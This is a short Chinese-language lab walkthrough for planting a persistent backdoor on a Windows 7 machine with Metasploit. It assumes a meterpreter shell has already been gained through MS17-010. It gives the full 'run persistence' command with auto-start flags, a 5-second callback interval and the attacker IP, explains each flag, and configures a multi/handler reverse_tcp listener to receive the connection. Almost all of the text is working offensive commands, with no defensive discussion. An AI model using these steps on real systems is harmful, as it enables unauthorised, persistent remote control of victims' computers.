Persistence:一款使用安装自动方式的持久性后门程序,可以利用它创建注册和文件
一、实验环境
攻击主机:2021 Kali (ip:192.168.110.130)
靶机:win7(专业版) (ip:192.168.110.134)
准备:先通过攻击获取一个 meterpreter shell(之前的文章中有介绍的 ms17-010漏洞)
二、实验步骤
1.获得 meterpreter shell 之后,输入 run persistence -A -S -U -i 5 -p 4444 -r 192.168.110.130
命令语法:
A:自动启动Payload程序
S:系统登录时自动加载
U:用户登录时自动启动
X:开机时自动加载
i:回连的时间间隔
P:监听反向连接端口号
r:目标机器 IP 地址(攻击主机)
2.执行结束后,可以获得persistence后门,同时会创建一个新的会话,然后将攻击主机(kali)重启。
3.kali输入 use exploit/multi/handler(监听模块,非常重要)
> set payload windows/meterpreter/reverse_tcp
> set LHOST 192.168.110.130
> set LPORT 4444(端口要和上面的persistence后门端口一致)
4.运行成功,获得meterpreter shell